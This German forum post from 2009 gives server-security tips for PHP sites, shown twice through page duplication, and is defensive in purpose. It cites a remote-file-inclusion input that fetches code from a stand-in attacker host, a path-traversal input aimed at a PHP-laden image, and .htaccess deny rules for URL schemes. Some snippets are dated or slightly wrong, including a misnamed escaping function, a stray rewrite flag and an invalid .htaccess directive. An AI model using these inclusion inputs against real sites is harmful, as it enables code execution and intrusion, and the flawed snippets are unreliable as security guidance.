» Server-Sicherheit verbessern - ein paar Tipps

mgutt · 20.02.2009, 02:37

Globale Variablen:
register_globals sollte immer ausgeschaltet sein. Ansonsten kann ein Hacker jede Variable über die URL ändern und übergeben.

Brute Force:
Hierbei probiert der Hacker jedes mögliche Passwort an Hand von einer Abfolge oder Wortsammlungen mit häufigen Wörtern durch. Daher sollten Passworteingaben bei z.B. 5 Fehleingaben zu einer zeitlichen Sperrung führen (z.B. 30 Minuten lang keine Passworteingabe mehr möglich). In der Regel lassen sich MySQL, FTP, htaccess und sonstige Passwörter nicht bei mehrfachen Fehleingaben sperren. Daher sollte man hier ein min. 8-stelliges Passwort wählen welches aus Klein- und Großbuchstaben, Zahlen und Sonderzeichen besteht und dieses sollte man ca. alle 3-6 Monate erneuern. Bis 6 Stellen knackt jeder Hacker das Passwort problemlos sofern er den entsprechenden MD5-String aus der Datenbank hat.

Mini Brute Force:
Eine weitere Abwandlung dieser Attacke nenne ich Mini Brute Force. Hier wird jeder Login 1x durchprobiert. Und zwar wird einfach als Passwort der Username übergeben. Schätzungsweise jeder 200. User hat als Passwort seinen Usernamen angegeben, daher sollte die Sperre für Fehleingaben unabhängig vom Loginnamen erfolgen (bei phpBB z.B. nicht Standard, hier kann man unendlich oft 1x pro User probieren). Oder man verwehrt von vorneherein die Möglichkeit, dass ein User seinen Namen als Passwort angeben kann.

MySQL Queries:
Wenn an Datenbankabfragen Variablen übergeben werden, dann sollte man IMMER mysql_real_escape() auf die Variablen anwenden. addslashes() reicht nicht aus bzw. erkennt nicht alle Anführungszeichen.

Session Highjacking:
Hier sollte klar sein, dass man über Session-IDs alleine keine Logins ermöglichen sollte. Sonst könnte ein Hacker einfach die Session-ID nehmen und sich mit dieser als ein anderer User anmelden. Große Forensoftware kombiniert Session-IDs mit Cookie und/oder IP-Adresse und ist demnach als sicher zu bezeichnen.

Cookie-Session Highjacking:
Hier modifziert der Hacker ein Cookie so, dass es z.B. die Login-Daten des Admins enthält und seine Session-ID etc. Daher sollten Adminbereiche immer doppelt gesichert werden. z.B. wenn ein Hacker ein Auto-Login Cookie stiehlt, kann er sich problemlos auch mit einer anderen IP als Admin im Forum bewegen. Bester Schutz ist daher das Admin-Verzeichnis per .htaccess / .htpasswd mit einem Passwort zu belegen und evtl. Löschmöglichkeiten im offenen Forum (Themen löschen etc.) mit Backups sichern und wiederherstellbar machen oder Themen löschen komplett zu deaktivieren. Bei mir ist es so, dass man nicht löschen kann. Themen landen immer in einem Unterforum (unsichtbar für User) und sind so problemlos wiederherstellbar.

external file inclusion (externe Dateieneinbindung):
Manche URLs haben das Format "page=index" und im Code selbst wird dann über include($page); die entsprechende Seite eingebunden. Das brigt die Gefahr, dass ein Hacker daraus "page=http://hackerseite.com/hacker.txt" einbinden kann. Es gibt in diesem Bereich viele Methoden. Daher empfehle ich in der htaccess pauschal diesen Code einzusetzen:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https\%3A\%2F\%2F(.*) [OR]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Damit kann dann in der URL kein "http:" etc. mehr eingebunden werden.

Alternativ bietet sich das in der .htaccess an, dass deaktiviert alle externen Einbindungen:

allow_url_fopen = Off

internal file inclusion (interne Dateieneinbindung):
Die aktuellste Methode der Hacker. Sie ist kaum zu unterbinden und erfordert, dass die Seite gute Sicherheitsmechanismen beim Einbinden von Dateien erfolgt. Ähnlich wie bei der external file inclusion werden hier Dateien über page=index in der URL eingebunden. Diesmal wird der Pfad aber korrigiert in "page=../bilder/bild.jpg" um so in einen Avatar-Ordner oder ähnliches zu gelangen, wo man vorher ein Bild hochgeladen hat. Jetzt könnte man sich fragen, was es dem Hacker bringt ein Bild einzubinden. Tatsächlich kann man neuerdings in der Kopfspalte eines Bildes php-Code einbinden und zwar als Kommentar. Es gibt jetzt Software, die einem dies erlaubt und PHP ist leider so dumm und wertet ein Bild tatsächlich aus, wenn Code in Form von darin untergebracht wurde.

programmierer-forum.de · Gast

Mach mit!

Wenn Dir die Beiträge zum Thread "Server-Sicherheit verbessern - ein paar Tipps" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden:

Registrierte Mitglieder genießen die folgenden Vorteile:
✔ kostenlose Mitgliedschaft
✔ keine Werbung
✔ direkter Austausch mit Gleichgesinnten
✔ neue Fragen stellen oder Diskussionen starten
✔ schnelle Hilfe bei Problemen
✔ Bilder und Videos hochladen
✔ und vieles mehr...

Autor	Nachricht
mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	20.02.2009, 02:37 zitieren Globale Variablen: register_globals sollte immer ausgeschaltet sein. Ansonsten kann ein Hacker jede Variable über die URL ändern und übergeben. Brute Force: Hierbei probiert der Hacker jedes mögliche Passwort an Hand von einer Abfolge oder Wortsammlungen mit häufigen Wörtern durch. Daher sollten Passworteingaben bei z.B. 5 Fehleingaben zu einer zeitlichen Sperrung führen (z.B. 30 Minuten lang keine Passworteingabe mehr möglich). In der Regel lassen sich MySQL, FTP, htaccess und sonstige Passwörter nicht bei mehrfachen Fehleingaben sperren. Daher sollte man hier ein min. 8-stelliges Passwort wählen welches aus Klein- und Großbuchstaben, Zahlen und Sonderzeichen besteht und dieses sollte man ca. alle 3-6 Monate erneuern. Bis 6 Stellen knackt jeder Hacker das Passwort problemlos sofern er den entsprechenden MD5-String aus der Datenbank hat. Mini Brute Force: Eine weitere Abwandlung dieser Attacke nenne ich Mini Brute Force. Hier wird jeder Login 1x durchprobiert. Und zwar wird einfach als Passwort der Username übergeben. Schätzungsweise jeder 200. User hat als Passwort seinen Usernamen angegeben, daher sollte die Sperre für Fehleingaben unabhängig vom Loginnamen erfolgen (bei phpBB z.B. nicht Standard, hier kann man unendlich oft 1x pro User probieren). Oder man verwehrt von vorneherein die Möglichkeit, dass ein User seinen Namen als Passwort angeben kann. MySQL Queries: Wenn an Datenbankabfragen Variablen übergeben werden, dann sollte man IMMER mysql_real_escape() auf die Variablen anwenden. addslashes() reicht nicht aus bzw. erkennt nicht alle Anführungszeichen. Session Highjacking: Hier sollte klar sein, dass man über Session-IDs alleine keine Logins ermöglichen sollte. Sonst könnte ein Hacker einfach die Session-ID nehmen und sich mit dieser als ein anderer User anmelden. Große Forensoftware kombiniert Session-IDs mit Cookie und/oder IP-Adresse und ist demnach als sicher zu bezeichnen. Cookie-Session Highjacking: Hier modifziert der Hacker ein Cookie so, dass es z.B. die Login-Daten des Admins enthält und seine Session-ID etc. Daher sollten Adminbereiche immer doppelt gesichert werden. z.B. wenn ein Hacker ein Auto-Login Cookie stiehlt, kann er sich problemlos auch mit einer anderen IP als Admin im Forum bewegen. Bester Schutz ist daher das Admin-Verzeichnis per .htaccess / .htpasswd mit einem Passwort zu belegen und evtl. Löschmöglichkeiten im offenen Forum (Themen löschen etc.) mit Backups sichern und wiederherstellbar machen oder Themen löschen komplett zu deaktivieren. Bei mir ist es so, dass man nicht löschen kann. Themen landen immer in einem Unterforum (unsichtbar für User) und sind so problemlos wiederherstellbar. external file inclusion (externe Dateieneinbindung): Manche URLs haben das Format "page=index" und im Code selbst wird dann über include($page); die entsprechende Seite eingebunden. Das brigt die Gefahr, dass ein Hacker daraus "page=http://hackerseite.com/hacker.txt" einbinden kann. Es gibt in diesem Bereich viele Methoden. Daher empfehle ich in der htaccess pauschal diesen Code einzusetzen: `RewriteEngine on RewriteCond %{QUERY_STRING} ^(.)=http://(.) [OR] RewriteCond %{QUERY_STRING} ^(.)=http\%3A\%2F\%2F(.) [OR] RewriteCond %{QUERY_STRING} ^(.)=ftp://(.) [OR] RewriteCond %{QUERY_STRING} ^(.)=ftp\%3A\%2F\%2F(.) [OR] RewriteCond %{QUERY_STRING} ^(.)=https://(.) [OR] RewriteCond %{QUERY_STRING} ^(.)=https\%3A\%2F\%2F(.) [OR] RewriteRule ^.$ http://127.0.0.1/ [R,L]` Damit kann dann in der URL kein "http:" etc. mehr eingebunden werden. Alternativ bietet sich das in der .htaccess an, dass deaktiviert alle externen Einbindungen: `allow_url_fopen = Off` internal file inclusion (interne Dateieneinbindung):* Die aktuellste Methode der Hacker. Sie ist kaum zu unterbinden und erfordert, dass die Seite gute Sicherheitsmechanismen beim Einbinden von Dateien erfolgt. Ähnlich wie bei der external file inclusion werden hier Dateien über page=index in der URL eingebunden. Diesmal wird der Pfad aber korrigiert in "page=../bilder/bild.jpg" um so in einen Avatar-Ordner oder ähnliches zu gelangen, wo man vorher ein Bild hochgeladen hat. Jetzt könnte man sich fragen, was es dem Hacker bringt ein Bild einzubinden. Tatsächlich kann man neuerdings in der Kopfspalte eines Bildes php-Code einbinden und zwar als Kommentar. Es gibt jetzt Software, die einem dies erlaubt und PHP ist leider so dumm und wertet ein Bild tatsächlich aus, wenn Code in Form von darin untergebracht wurde. Gefällt mir Teilen twittern
▲	pn email

programmierer-forum.de Gast	20.02.2009, 02:37 zitieren Mach mit! Wenn Dir die Beiträge zum Thread "Server-Sicherheit verbessern - ein paar Tipps" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden: Registrierte Mitglieder genießen die folgenden Vorteile: ✔ kostenlose Mitgliedschaft ✔ keine Werbung ✔ direkter Austausch mit Gleichgesinnten ✔ neue Fragen stellen oder Diskussionen starten ✔ schnelle Hilfe bei Problemen ✔ Bilder und Videos hochladen ✔ und vieles mehr...
▲

	Re: √	Letzter Beitrag
CRX Frontaufprall-Sicherheit verbessern Moin. Ich möchte hier mal eine Diskussion zum Thema "wie könnte man einen Frontaufprall abmildern" starten. Mehrere Crashvideos und erschreckende Bilder haben mir gezeigt, dass Crx was einen Frontaufprall betrifft sehr "weich" und... von mbboy	3 240	23.04.2014, 11:02 Maou
Server geht für ein paar Minuten Offline Wir wechseln gerade den Datenbankserver. Dauert nicht... von mgutt	14 640	27.07.2012, 12:29 mgutt
Brauche ein paar Tipps Hi, Ich bräuchte mal ein paar Tipps von den Profis. Und zwar löst sich meine Folie immer an den Rundungen und Schnittkanten. Gibt es da einen Trick damit sich das nicht wieder... von Coby	10 605	03.03.2014, 11:17 nik1965
Auch mal ein paar Tipps von mir Wer etwas länger anlegen möchte (also nicht nur ein paar Stunden oder Tage), für den wäre eventuell Swedish Match, HP, Fortum oder G.electric etwas. Dort ist dieses Jahr einiges zu erwarten. Also einfach mal anschauen oder informieren, dann wisst ihr... von Nine	0 249	04.01.2012, 18:28 Nine
Nen Paar Tipps zum Sol bitte !!! Hi Leute. Nen Kumpel von mir hat grosses Intresse am Del sol. Er fährt sich am Samstag einen angucken. :D Hier nen paar Daten: - 73.000 km :yes: - Bj. 07 / 1997 - 125 PS ... von HondaFan	2 520	15.08.2007, 23:25 crazychrisi
EJ9 motorswap. bräuchte ein paar tipps Hallo hab vor mein ek3 motor einzubauen in mein ej9(bj 2000) soweit ich mich schlau gemacht hab gibt es vom einbau kein problem.. also passt alles rein. nur eins bin ich mir nicht so sicher und zwar wegen der elektrik ich bräuchte ja dann auch ein... von Klokaempfer	19 694	24.01.2010, 11:16 Klokaempfer
führerschein neuling ...benötig paar tipps hy ich werde bald den schein machen und da stellt sich die frage welche maschine fürn anfang gut is kenn mich nicht aus mit motorrädern also bitte keine blöden sprüche habe mir honda cbr 600 mit 98 ps vorgestellt is die zu stark ? bitte um hilfe danke... von hondacrxee8	4 451	09.09.2011, 19:12 hondacrxee8
paar tipps zur eigenen neuen wohnung nabend zusammen, so morgen werd ich mein 1 eigenen mietvertrag unterschreiben! 70m² für 350 euro warm :) kann mir jemand ein paar tipps geben auf was man in der anfangszeit so achten soll? mir gehts so ums allgemeine bin für jeden tipp dankbar... von dbmaster	32 1.186	15.03.2008, 17:10 dbmaster
Bräuchte mal Paar Tipps, Erfahrungsberichte vom Civic Hi Ich bin Neu hier im Forum und Suche Rat zum Civic Kauf. Zur Zeit Fahre Ich nen Zafira A, aber möchte mir gern nen Zweitwagen zulegen, einen vernünftigen 3 Türigen Japaner der keine Werkstatt kennen soll. ;) Da meine Frau nen Schein macht... von DORTMUNDAR	79 2.535	02.04.2011, 17:37 DORTMUNDAR
b16a2 swap, benötige paar tipps Sers alle miteinander! Da bestimmt einige gibt die sich einen neuen motor verbaut haben denke ich, werden einige dabei sein die mir paar hilfreiche tipps geben könnten. Also folgendes liegt an habe vor meinem EJ2 ne B16a2 maschine rein zu bauen was... von artjomEJ2	0 480	04.10.2007, 16:27 artjomEJ2